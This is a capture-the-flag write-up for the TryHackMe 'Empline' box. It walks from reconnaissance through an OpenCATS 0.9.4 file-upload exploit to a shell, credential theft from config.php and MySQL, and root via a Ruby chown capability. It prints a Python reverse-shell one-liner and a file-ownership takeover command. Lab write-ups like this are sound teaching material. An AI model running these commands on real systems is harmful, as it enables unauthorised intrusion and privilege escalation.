THM Empline
Last updated
Last updated
Another day another challenge, randomly picked up any free box and empline was chosen. This box was created by Touklwez where before this he also created box Mustachhio. I hope you had fun with this one! Good Hacking!
As usual, start with basic nmap scan. I like to use sudo nmap -p- --open -T4 {machine_IP} and gobuster to brute directory.
From both results, we know that 3 port are open and go buster not provided with interesting result. Next, I use link finder to find any hidden directory being stored in java script.
From this scanning, we managed to get another subdomain. Let put into our host. After that, start again with brute directory.
We managed to get bunch of interesting directories. Let proceed to landing page.
On landing page, it ask login with username and password.
I got lot of information from this page and also source code. Opencats v 0.9.4 and some credentials as default and testing. Unfortunately, both credentials not working. Rabbit hole!!
Next, I am looking for vulnerabilities for this open source ATS. From exploitDB, this version have vulnerabilities where it fails to validate file uploads.
Using provided poc, I manage to get www-data.
Here, we can stable our shell with this command by using command provided in revshell.
export RHOST="yourmachine";export RPORT=port;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
Opening listening, we manage to get raw shell and stable it uses normal command.
Since we are www-data, normally I will search for config.php since that file contains lot of sensitive information that can be helpful for me as attacker.
We got database credentials. Earlier scan show mysql port are open. Let proceed to mysql using credential give.
We manage to get list databases available. Let find credentials here.
From this table, we manage to get 2 user, but early enumeration found that user are George. Let take the hash and find real password.
We in!! Here got first flag.
Checking user sudo permission, nothing interesting. Next, I check SUID using this script
getcap -r / 2>/dev/null
As ruby, we can change owner or in my understanding, we can change ownership for any file. After few research, I just assigned George to file that being restricted. (not practical way). After that, change the root password or add new user in root group or assign ownership.
ruby -e "require 'fileutils'" -e "FileUtils.chown('user','user','<pathfile>')"
We manage to get flag for root. Thanks for reading!
Opencats ATS system leads to RCE
Ruby capabilities
